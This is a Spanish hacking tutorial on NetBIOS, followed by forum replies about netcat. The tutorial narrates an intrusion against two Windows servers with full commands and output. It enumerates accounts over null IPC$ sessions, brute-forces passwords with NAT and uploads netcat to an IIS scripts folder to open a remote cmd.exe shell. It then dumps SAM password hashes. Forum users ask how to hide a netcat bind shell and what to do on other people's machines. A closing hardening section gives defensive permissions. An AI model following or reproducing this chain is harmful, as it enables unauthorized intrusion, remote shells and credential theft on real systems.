vamos a tratar .....



NetBIOS ( Network Basic Input/Output System )
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

NetBIOS fue desarrollado por IBM y Systek como un intento de proveer a
las apliaciones de una interfaz para acceder a los recursos de las
redes locales. Al ser solo una interfaz entre las aplicaciones y la
tarjeta de red, y por tanto poder ser utilizado con independencia del
hardware, hizo que pronto se convirtiera en un estandar para acceder a
redes ( ethernet, TokenRing, redes IBM, ... ).

NetBIOS ha sido utilizado ampliamente para compartir recursos de una
manera simple y eficiente en redes pequeñas. Proporcionando tanto
servicios orientados a conexion ( sesiones ) como no orientados a
conexion ( datagramas ), al igual que soporta broadcast y multicast.

Posteriormente surgio NetBEUI que no es mas que una version extendida
de NetBIOS que proporciono una capa de transporte que nunca fue
estandarizada en NetBIOS.

NetBIOS puede ser utilizado en la inmesa mayoria de los sistemas
operativos de red y puede ser transportado sobre variedad de
protocolos, generalmente sobre TCP/IP (NBT), IPX, ...



Nombres NetBIOS
=-=-=-=-=-=-=-=

Son usados para identificar recursos en la red, las direcciones de
bajo nivel no estan disponibles para las aplicaciones, sino que las
equipos utilizan estos nombres para comnunicarse y establecer sesiones
entre si. Estos nombres deben tener una longitud maxima de 16
caracteres alfanumericos, siendo el primero distinto de *.

Cada vez que un equipo se activa este comienza un proceso de registro,
para ello emite varias veces un mensaje de broadcast en el que indica
su nombre netbios. Si algun otro equipo de la red esta utilizando ese
nombre, este a su vez manda mensajes de broadcasts para advertirlo.
Por lo tanto el equipo que queria registrarse con un nombre ya en uso
para y termina su intento de registro. Si por el contrario ningun otro
equipo emite mensajes indicando que el nombre ya esta en uso, el
cliente se registrara con exito.

Hay dos tipos de nombres, unicos ( unique ) y de grupos ( group ), los
nombre unicos son aquellos que son llevados individualmente por un
equipo al mismo tiempo, es decir no deben repetirse en la red en caso
contrario se producirian mensajes de error debido a conflictos de
nombres. En los grupos todas las instancias de un mismo nombre son
equivalentes y pueden repetirse a lo largo de la red.

Microsoft en su implementacion limita el tamaño de los nombres a 15
caracteres maximos, utilizando el ultimo byte como un sufijo para
identificar el tipo de servicio. Cada nodo mantiene una tabla con
informacion de los nombres que tiene en uso, esta tabla se puede
obtener mediante la orden nbtstat. Acontinuacion una tabla de los
sufijos utilazados por Windows NT.



Nombre              Sufijo  Tipo     Servicio
-------------------------------------------------------------------
<computername>        00     U       Workstation Service
<computername>        01     U       Messenger Service
<\\_MSBROWSE_>        01     G       Master Browser
<computername>        03     U       Messenger Service
<computername>        06     U       RAS Server Service
<computername>        1F     U       NetDDE Service
<computername>        20     U       File Server Service
<computername>        21     U       RAS Client Service
<computername>        22     U       Exchange Interchange
<computername>        23     U       Exchange Store
<computername>        24     U       Exchange Directory
<computername>        30     U       Modem Sharing Server Service
<computername>        31     U       Modem Sharing Client Service
<computername>        43     U       SMS Client Remote Control
<computername>        44     U       SMS Admin Remote Control Tool
<computername>        45     U       SMS Client Remote Chat
<computername>        46     U       SMS Client Remote Transfer
<computername>        4C     U       DEC Pathworks TCPIP Service
<computername>        52     U       DEC Pathworks TCPIP Service
<computername>        87     U       Exchange MTA
<computername>        6A     U       Exchange IMC
<computername>        BE     U       Network Monitor Agent
<computername>        BF     U       Network Monitor Apps
<username>            03     U       Messenger Service
<domain>              00     G       Domain Name
<domain>              1B     U       Domain Master Browser
<domain>              1C     G       Domain Controllers
<domain>              1D     U       Master Browser
<domain>              1E     G       Browser Service Elections
<INet~Services>       1C     G       Internet Information Server
<IS~Computer_name>    00     U       Internet Information Server




Jugando con los servidores
=-=-==-=-==-=-==-=-=-=-=-=

Ahora pasaremos a una parte mas practica, que seguro os gusta mas :)

El objetivo es demostrar todo lo visto hasta ahora, es decir, obtener
la tabla de nombres de los nodos, listas de usuarios, recursos
compartidos y toda aquella informacion que podamos y nos pueda ser
util.

En primer lugar seleccionamos una serie de posibles victimas, que en
nuestro caso obtenemos realizando un pequeño scaneo a una clase C
( x.x.x.1/24 ) el resultado nos muestra que tenemos dos maquinas
activas una ejecutandose bajo Windows NT 4.0 ( x.x.x.92 ) y otra bajo
Windows 2000 RC1 ( x.x.x.96 ). Aun asi queremos mas informacion sobre
los distintos servicios que corren y con ayuda de nmap realizamos un
scaneao a ambas...


zeroxt@candela:~/hack > nmap -sS -O x.x.x.92

Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com, www.insecure...
Interesting ports on  (x.x.x.92):
Port    State       Protocol  Service
21      open        tcp       ftp
25      open        tcp       smtp
135     open        tcp       loc-srv
139     open        tcp       netbios-ssn
256     open        tcp       rap
257     open        tcp       set
258     open        tcp       yak-chat
259     open        tcp       esro-gen
261     open        tcp       nsiiops
262     open        tcp       arcisdms
1030    open        tcp       iad1
1031    open        tcp       iad2
1032    open        tcp       iad3

TCP Sequence Prediction: Class=trivial time dependency
                         Difficulty=8 (Trivial joke)
Remote operating system guess: Windows NT4 / Win95 / Win98

Nmap run completed -- 1 IP address (1 host up) scanned in 34 sec



zeroxt@candela:~/hack > nmap -sS -O x.x.x.96

Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com, www.insecure...
Interesting ports on  (x.x.x.96):
Port    State       Protocol  Service
7       open        tcp       echo
9       open        tcp       discard
13      open        tcp       daytime
17      open        tcp       qotd
19      open        tcp       chargen
21      open        tcp       ftp
25      open        tcp       smtp
42      open        tcp       nameserver
53      open        tcp       domain
80      open        tcp       http
135     open        tcp       loc-srv
139     open        tcp       netbios-ssn
258     open        tcp       yak-chat
261     open        tcp       nsiiops
443     open        tcp       https
445     open        tcp       microsoft-ds
1025    open        tcp       listen
3389    open        tcp       msrdp

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=24300 (Worthy challenge)
Remote operating system guess: Windows 2000 RC1

Nmap run completed -- 1 IP address (1 host up) scanned in 56 sec
zeroxt@candela:~/hack >


Para conseguir mas informacion obtenemos la Tabla de Nombre NetBios de
las dos maquinas ...


zeroxt@candela:~/hack > nmblookup -A x.x.x.92
Looking up status of x.x.x.92
received 9 names
        CARMEN          <20> -         B <ACTIVE>
        CARMEN          <00> -         B <ACTIVE>
        DOMINIO3        <1b> -         B <ACTIVE>
        DOMINIO3        <1c> - <GROUP> B <ACTIVE>
        DOMINIO3        <00> - <GROUP> B <ACTIVE>
        DOMINIO3        <1e> - <GROUP> B <ACTIVE>
        CARMEN          <03> -         B <ACTIVE>
        DOMINIO3        <1d> -         B <ACTIVE>
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>
num_good_sends=0 num_good_receives=0

zeroxt@candela:~/hack >



Como vemos esta maquina hace de Controlador del dominio DOMINIO3, es
el Master Browser y su nombre NetBIOS es CARMEN.


zeroxt@candela:~/hack > nmblookup -A x.x.x.96
Looking up status of x.x.x.96
received 8 names
        EULER           <00> -         M <ACTIVE>
        EULER           <20> -         M <ACTIVE>
        DOMINIO3        <00> - <GROUP> M <ACTIVE>
        EULER           <03> -         M <ACTIVE>
        DOMINIO3        <1e> - <GROUP> M <ACTIVE>
        INet~Services   <1c> - <GROUP> M <ACTIVE>
        IS~EULER        <00> -         M <ACTIVE>
        ADMINISTRADOR   <03> -         M <ACTIVE>
num_good_sends=0 num_good_receives=0

zeroxt@candela:~/hack >


En esta otra vemos que es miembro del dominio DOMINIO3, su nombre
NetBIOs es EULER, esta ejecutando los servicios IIS y existe un
usuario ADMINISTRADOR conectado y que probablemente sera la cuenta de
administracion por defecto :). Aun asi nos aseguraremos y obtendremos
la cuenta de Administrador de las dos maquinas y la lista de usuarios
de ambos, que podremos utilizar como base para un ataque por fuerza
bruta y testear asi la seguridad de las contraseñas de usuarios.

Para realizar esta tarea haremos uso de las herramientas SID.




Conexiones Nulas ( IPC$ )
=-=-=-=-=-=-=-=-=-=-=-=-=

Windows NT hace uso de un recurso compartido oculto ( IPC$ ) y que se
utiliza para intercomunicacion entre procesos. Este recurso permite
a cualquiera establecer una sesion nula con el servidor. Y que debido
a los permisos por defecto de NT nos permite acceder a determinda
informacion como son listas de usuarios, recursos compartidos, ...
Informacion que nos puede servir para buscar nuevos fallos de seguridad

Acontinuacion obtendremos la lista de usuario y la cuenta del
administrador del sistema, para ello como dijimos anteriormente
haremos uso de las herramientas SID: user2sid que nos permite obtener
el SID de un usuario o grupo y sid2user que nos permite obtener la
informacion asociada a un SID.

En primer lugar establecemos una conexion nula y obtenemos el SID de
un grupo por defecto ( ya que los grupos no se pueden renombrar )

C:\hack\sid>net use \\carmen "" /u:""
Se ha completado el comando correctamente.


C:\hack\sid>user2sid \\carmen "Usuarios del dominio"

S-1-5-21-445120578-907631837-612134452-513

Number of subauthorities is 5
Domain is DOMINIO3
Length of SID in memory is 28 bytes
Type of SID is SidTypeGroup


Una vez obtenido, podemos obtener todas las cuentas del sistema, cuyo
SID solo difiere en su ultimo campo denominado RID. Para la cuenta de
administrador el RID es 500, para el resto de cuentas es 1000, 1001,
1002, ....


C:\hack\sid>sid2user \\carmen 5 21 445120578 907631837 612134452 500

Name is ServerAdmin
Domain is DOMINIO3
Type of SID is SidTypeUser


mmm, curioso la cuenta de administrador ha sido renombrada a
ServerAdmin.

Lo mismo para el servidor con Windows 2000 ...


C:\hack\sid>net use \\euler "" /u:""
Se ha completado el comando correctamente.

C:\hack\sid>user2sid \\euler "Invitado"

S-1-5-21-861567501-1993962763-1202660629-501

Number of subauthorities is 5
Domain is DOMINIO3
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser


C:\hack\sid>sid2user \\euler 5 21 861567501 1993962763 1202660629 500

Name is Administrador
Domain is DOMINIO3
Type of SID is SidTypeUser


C:\hack\sid>sid2user \\euler 5 21 861567501 1993962763 1202660629 1000

Name is TsInternetUser
Domain is DOMINIO3
Type of SID is SidTypeUser


C:\hack\sid>sid2user \\euler 5 21 861567501 1993962763 1202660629 1001

Name is IUSR_EULER
Domain is DOMINIO3
Type of SID is SidTypeUser


C:\hack\sid>sid2user \\euler 5 21 861567501 1993962763 1202660629 1002

Name is IWAM_EULER
Domain is DOMINIO3
Type of SID is SidTypeUser




NAT ( NetBIOS Auditing Tool )
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Una vez tenemos la lista de usuarios de los sistemas y las respectivas
cuentas de administracion local. Podemos realizar un ataque por fuerza
bruta a las contraseñas, para ello hacemos uso de NAT ( NetBIOS
Auditing Tool )



zeroxt@candela:~/hack/nat > ./nat -i x.x.x.96

  • NAT - NetBIOS Auditing Tool v2.0
    Copyright 1996, 1997, 1998, Secure Networks Inc.

  • Host x.x.x.96 (unknown) checked on Sun Mar 21 01:20:27 1999
  • Remote system name tables

        EULER
        DOMINIO3
        INet~Services
        IS~EULER
        ADMINISTRADOR

  • Trying to connect with 'EULER'
  • Connected with NetBIOS name EULER
  • Dialect selected: NT LM 0.12
  • Server has share level security enabled
  • Server supports password encryption
  • Remote server's workgroup: DOMINIO3
  • Logging in as '' with password ''
  • Able to login as user '' with password ''
  • Server Operating System: Windows 5.0
  • Lan Manager Software   : Windows 2000 LAN Manager
  • Unable to list shares as '' user
  • Guessing passwords
  • Trying to login as user 'ADMINISTRATOR' with password 'ADMINISTRAT
  • Trying to login as user 'ADMINISTRATOR' with password 'GUEST'
  • Trying to login as user 'ADMINISTRATOR' with password 'ROOT'
  • Trying to login as user 'ADMINISTRATOR' with password 'ADMIN'
  • Trying to login as user 'ADMINISTRATOR' with password 'PASSWORD'
  • Trying to login as user 'ADMINISTRATOR' with password 'TEMP'
  • Guessed: ADMINISTRATOR Password: ADMINISTRATOR
  • Logging in as 'ADMINISTRATOR' with password 'ADMINISTRATOR'
  • Able to login as user 'ADMINISTRATOR' with password 'ADMINISTRATOR
  • Workstation information

        Computer Name  : EULER
        User Name      :
        Work Group     : DOMINIO3
        Version        : 5.0
        Logon Domain   :
        Other Domains  :


  • Able to list shares as 'ADMINISTRATOR' user

        C$            DISK       Recurso predeterminado
        ADMIN$        DISK       Admin remota
        Inetpub       DISK
        IPC$          IPC        IPC remota
        E$            DISK       Recurso predeterminado

  • WARNING: Able to connect to \\EULER\Inetpub as 'ADMINISTRATOR' use
  • WARNING: Able to WRITE to \\EULER\Inetpub
  • WARNING: Able to connect to \\EULER\IPC$ as 'ADMINISTRATOR' user


zeroxt@candela:~/hack/nat >



Evidentemente la cuenta ADMINISTRATOR no es una cuenta con privilegios
de administrador sino una cuenta de usuario creada quiza para atraer a
posibles hackes, y tanto que nos va a ser muy util ya que por descuido
del administrador tiene permisos de escritura en \Inetpub.

Lo cual nos va a permitir ejecutar comandos con los privilegios de
IUSR_EULER subiendo un fichero al directorio \InetPub\scripts que
por defecto tiene permisos de ejecucion. El fichero elegido sera una
copia de netcat que nos permitira acceder al sistema :)


zeroxt@candela:~/ > smbclient  \\\\x.x.x.96\\InetPub -U ADMINISTRATOR
Password:
Domain=[DOMINIO3] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
smb: \> ls
  .                                   D        0  Sun Mar 12 15:57:08
  ..                                  D        0  Sun Mar 12 15:57:08
  wwwroot                             D        0  Sun Mar 12 15:57:08
  AdminScripts                        D        0  Sun Mar 12 15:57:20
  iissamples                          D        0  Sun Mar 12 15:57:20
  Mail                                D        0  Sun Mar 12 15:59:08
  scripts                             D        0  Sun Mar 12 16:02:28
  ftproot                             D        0  Sun Mar 12 16:03:26
  mailroot                            D        0  Sun Mar 12 16:03:28
  iisstart.asp                        A        0  Sat Mar 18 03:16:56

                58497 blocks of size 65536. 24655 blocks available
smb: \> cd scripts
smb: \scripts\> ls
  .                                   D        0  Sun Mar 12 16:02:28
  ..                                  D        0  Sun Mar 12 16:02:28

                58497 blocks of size 65536. 24655 blocks available
smb: \scripts\> put netcat.exe
putting file netcat.exe as \scripts\netcat.exe
smb: \scripts\> exit


zeroxt@candela:~/hack/nat > lynx http://x.x.x.96/scripts/netcat.exe?
-l%20-p%2023%20-e%20cmd.exe

zeroxt@candela:~/hack/nat > netcat x.x.x.96 23
Microsoft Windows 2000 [Versión 5.00.2072]
Microsoft(R) Windows(TM)
(C) Copyright 1985-1999 Microsoft Corp.

e:\inetpub\scripts>

tachan! :)


Ya estamos dentro con permisos del usuario IIS :). Debido a los
permisos por defecto y al FDC cualquier usuario tiene acceso completo
al directorio \winnt. Por lo que sustituir cualquier archivo por un
troyano, instalar un sniffer o cualquier otro tipo de accion seria
trivial. Ahora podemos obtener una copia del archivo de claves
de NT del directorio \winnt\repair y obtener las distintas claves
con ayuda del l0phtcrack


E:\Inetpub\scripts>samdump \winnt\repair\sam
samdump \winnt\repair\sam
Administrador:500:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXX
XXX:Cuenta para la administraci¾n del equipo o dominio::

Invitado:501:NO PASSWORD*********************:NO PASSWORD************
*********:Cuenta para acceso como invitado al equipo o dominio::

TsInternetUser:1000:B857426F10E9987B81B7BF4162DE158E:C25DB5748E64161C
C464C5C2D384E48F:TsInternetUser,Servicios de Terminal Server usa esta
 cuenta de usuario.::

IUSR_EULER:1001:740A765CDE56E4322527D6405C7A9FBF:659F670CD71A4D472803
31EA0D5ACFC6:Cuenta de invitado a Internet,Cuenta integrada para acce
so an¾nimo a Servicios de Internet Information Server::

IWAM_EULER:1002:8D477648397EAA89488B9B9789336A73:005CFF626C455FC73988
6EA4F7A47AEA:Iniciar la cuenta de proceso IIS,Cuenta integrada para e
l inicio de los Servicios de Internet Information Server fuera de las
 aplicaciones de proceso::

SAMDump 1.0beta. Created by Dmitry Andrianov



En unas horas se obtuvo la clave de administrador para el servidor
y se pudo acceder al servidor con permisos totales. Desde este a su
vez se realizo un ataque por diccionario al servidor NT ( x.x.x.92 )
y que se completo en poco tiempo.


C:\zeroxt>net use \\x.x.x.96\C$ xxxxxxx /u:Administrador
Se ha completado el comando correctamente.

C:\zeroxt>net use \\x.x.x.92\E$ xxxxx /u:ServerAdmin
Se ha completado el comando correctamente.


( Claves omitidas )




Soluciones a la Inseguridad
=-=-=-=-=-=-=-=-=-=-=-=-=-=

Como habeis podido comprobar la seguridad es muy importante, seamos
una pequeña empresa, una gran empresa, o un simple usuario que dedica
su tiempo a navegar por la red, siempre estamos en peligro y abiertos
a cualquier tipo de ataque. Y es que hay gente que se puede decir solo
vive para entrar en ordenadores ajenos, dando igual lo que contengan
solo por el mero hecho de investigar un poco mas. Y todo hay que
decirlo tambien hay los que lo hacen para joder un poco mas, y hacer
cosas tan absurdas como un "deltree \*.*" o un "rm -fr /". Sea lo que
sea esta claro que a nadie le gusta que le miren en su disco duro
aunque solo tenga fotos xXX ...

Hemos visto lo facil que resulta acceder a un ordenador que no este
correctamente configurado y con permisos por defecto. La mayor parte
de los ataques en Windows se realizan atraves de recursos compartidos
por medio de NetBIOS, servicios mal configurado, etc. Como medida a
esto se recomienda no utilizar NBT ( NetBIOS sobre TCP/IP ) a no ser
que ser que sea estrictamente necesario y en esta caso siempre filtrar
los accesos mediante un firewall y permitir solo accesos a la
intranet.

Tambien tenemos que estar pendientes de la seguridad en la intranet,
ya que cualquier empleado un poco 'aburrido' podria dedicarse a jugar
con nosotros. Debemos denegar el acceso de login en la consola a los
usuarios, y establer fuertes permisos en el sistema de archivos ya
que como vimos anteriormente por defecto cualquier usuario tiene
acceso completo a \WINNT. Se recomienda cambiar los permisos y
establecerlos de la siguiente forma.



%SystemRoot%
Administrators: Full Control (All)
CREATOR OWNER: Full Control (All)
Everyone: Add and Read (RWX)(RX)
SYSTEM: Full Control (All)
Server Operators: Change (RWXD)

%SystemRoot%\FONTS
Administrators: Full Control (All)
CREATOR OWNER: Full Control (All)
Everyone: Add & Read (RWX)(RX)
SYSTEM: Full Control (All)
Server Operators: Change (RWXD)

%SystemRoot%\HELP
Administrators: Full Control (All)
CREATOR OWNER: Full Control (All)
Everyone: Add & Read (RWX)(RX)
SYSTEM: Full Control (All)
Server Operators: Change (RWXD)

%SystemRoot%\INF
Administrators: Full Control (All)
CREATOR OWNER: Full Control (All)
Everyone: Add & Read (RWX)(RX)
SYSTEM: Full Control (All)
Server Operators: Change (RWXD)

%SystemRoot%\PROFILES
Administrators: Full Control (All)
CREATOR OWNER: Full Control (All)
Everyone: Add and Read (RWX)(RX)
SYSTEM: Full Control (All)
Server Operators: Change (RWXD)

%SystemRoot%\REPAIR
Administrators: Full Control (All)
SYSTEM: Full Control (All)
Server Operators: Change (RWXD)

%SystemRoot%\SYSTEM
Administrators: Full Control (All)
CREATOR OWNER: Full Control (All)
Everyone: Add and Read (RWX)(RX)
SYSTEM: Full Control (All)
Server Operators: Change (RWXD)
%SystemRoot%\SYSTEM32

Administrators: Full Control (All)
CREATOR OWNER: Full Control (All)
Everyone: Add and Read (RWX)(RX)
SYSTEM: Full Control (All)
Server Operators: Change (RWXD)

%SystemRoot%\SYSTEM32\DHCP
Sino usamos un servidor DHCP se recomienda borrarla

%SystemRoot%\SYSTEM32\LOGFILES
Administrators: Full Control (All)
CREATOR OWNER: Full Control (All)
Everyone: Read (RX)
SYSTEM: Full Control (All)
Server Operators: Change (RWXD)

%SystemRoot%\SYSTEM32\RAS
Si no usamos RAS borrarlo, sino resringirlo a los usuarios RAS

%SystemRoot%\SYSTEM32\VIEWERS
Administrators: Full Control (All)
CREATOR OWNER: Full Control (All)
Everyone: Add and Read (RWX)(RX)
SYSTEM: Full Control (All)
Server Operators: Change (RWXD)

%SystemRoot%\SYSTEM32\WINS
Si no usamos WINS borrarlo

\BOOT.INI
Administrators: Full Control (All)
SYSTEM: Full Control (All)

\NTDETECT.COM
Administrators: Full Control (All)
SYSTEM: Full Control (All)
NTLDR
Administrators: Full Control (All)
SYSTEM: Full Control (All)

\AUTOEXEC.BAT
Administrators: Full Control (All)
Everybody: Read (RX)
SYSTEM: Full Control (All)

\CONFIG.SYS
Administrators: Full Control (All)
Everybody: Read (RX)
SYSTEM: Full Control (All)



Muchos libros recomiendan renombrar la cuenta de Administador, pero
como hemos visto resulta inutil ya que es trivial a averiguarla por
medio de una sesion nula. Estas sesiones nulas se establecen mediante
NetBIOS, por lo que si filtramos adecuadamente los puertos usados
por NetBIOS no sera posible el listado de usuarios, cuenta de
Administrados, recursos compartidos, etc.




Enlaces / Bibliografia
=-=-=-==-=-=-=-=-=-=-=


[ l0pthcrack ] - www.l0pht.com
[ SID Tools ] - http://www.technotronic.com/microsoft.html
[ NAT ] - http://www.technotronic.com/microsoft.html
[ Understanding NetBIOS by NeonSurge ]
[ Windows NT Unleashed ]
[ RFC1001 ]

saludos a todos


Título: Re: El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: loren148 en 30 Agosto 2006, 20:38 pm
hola a todos, pregunta sobre netcat, le doy a abrir voy a meter el comando de menu nc -h y la pantalla desaparece, pq no puedo hacer nada, tengo una version mala=?


Título: Re: El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: Neosolitario en 4 Septiembre 2006, 05:26 am
El problema q tienes es por que no estas ejecutando el nc desde una ventana de ms-dos para que todo te valla bien copias el archivo nc.exe al directorio C:\windows\system32\nc.exe y abre una ventana de ms-dos pj: inicio ejecutar cmd.exe y utiliza el netcat haora

P.D Aconstumbrate a leer y experimentar mas antes de postear


Título: Re: El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: Akellend en 21 Junio 2007, 01:01 am
no me va el link  :(


Título: Re: El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: ¹4¹² en 22 Septiembre 2007, 17:24 pm
Wenas,yo necesitaria que alguien me dijera los comandos a usar en l Netcat ,ya que me qedo flipando cn lo q escriben,o algun amual...SAlu2


Título: Re: El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: greenday(ai) en 23 Enero 2008, 04:40 am
 Mucho Copiar y pegar no creen?
Pero esta Bueno!


Título: Re: El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: coyotte en 17 Marzo 2008, 17:08 pm
El mejor netcat es UNIX.  ;D


Título: Re: El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: dieguitho en 9 Mayo 2008, 00:23 am
ey el link que tienen para conseguir netcat no funciona y me pudieran proporcionar otro paconseguir netcat?


Título: Re: El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: ni0x en 9 Mayo 2008, 13:07 pm
ey el link que tienen para conseguir netcat no funciona y me pudieran proporcionar otro paconseguir netcat?


http://foro.elhacker.net/hacking_basico/descargar_netcat_para_windows-t166570.0.html
http://foro.elhacker.net/hacking_basico/netcat-t164902.0.html

Utiliza el buscador.


Título: Re: El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: softdates en 7 Junio 2008, 22:54 pm
http://www.usuarios.lycos.es/orlyyan/index.html hice una recopilacion pequeña sobre el uso de netcat en window


Título: Re: El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: Engo en 23 Junio 2008, 10:58 am
Hola, alguien me puede decir como hacer para ocultar el netcat? cuando lo dejo escuchando puertos si se esconde con el comando -d pero cuando quiero que se esconda para dejarlo de servidor con cmd ---> nc -l -d -e cmd.exe 6000 <--- el -d no me sirve de nada, y si lo meto en un .bat se me queda la pantalla negra, el netcat no se independiza del cmd. Si alguien puede ayudarme, gracias


Título: ayuda!!!
Publicado por: 1w1 en 5 Marzo 2009, 22:40 pm
Hola, quisiera saber si alguien me puede dejar un link en el cual descargar netcat pero para windows, si es que existe....

Gracias de antemano!!!


Título: Re: El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: ank2909 en 15 Marzo 2009, 14:14 pm
hola;


tengo un problema con el link para descargar el netcat podrias decirme donde puedo descargar el netcat xk esa pagina me sale k no existe o estacaducada nose el xk ii gracias de ante mano ii me podrias poner donde descargarlo con el codigo fuente para compilarlo yo x cierto mi sistema opertavo es windows especificando es Windows Xp!




Muxisimas gracias de antemano! :D


Título: Re: El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: harth en 2 Julio 2009, 16:13 pm
hola... soi nuevo en este foro y quisiera responder primero los posts anteriores...
sobre el link de descarga yo lo descargue de webscripts.softpedia.com/script/.../Netcat-27515.html .. por otro lado, ya que soi algo novato quisiera que me recomienden lo que mejor se puede hacer al tomar una shell de otra persona (si se que se requiere imaginacion nada mas pero como recien comienzo, no se muchos de los comandos que puedo utilizar). se como troyanizar en netcat pero al entrar en el DOS de la otra maquina, me quedo sin hacer nada :(.  AH tambien quisiera que me pongan links para descargar algun programa que escanee ip mediante el DOS (que no sea netmap porfavor... simplemente es muy complicado) ;D

toda ayuda es bienvenida.

de verdad este foro es muy bueno los felicito, y espero poder ayudar en un futuro.


Título: Re: El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: Ruperstinsky09 en 28 Septiembre 2010, 05:06 am
oye esta cool tu pots pero una pregunta supongo que si pero ando viendo lo de como usar el netcat cual seria el comando para hacer un scan de ip es que ando buscando algo parecido al ipscan que he manejado en windows quisiera saber si este programa que yo creo qsi pero como seria el comando para checar las ips en una red local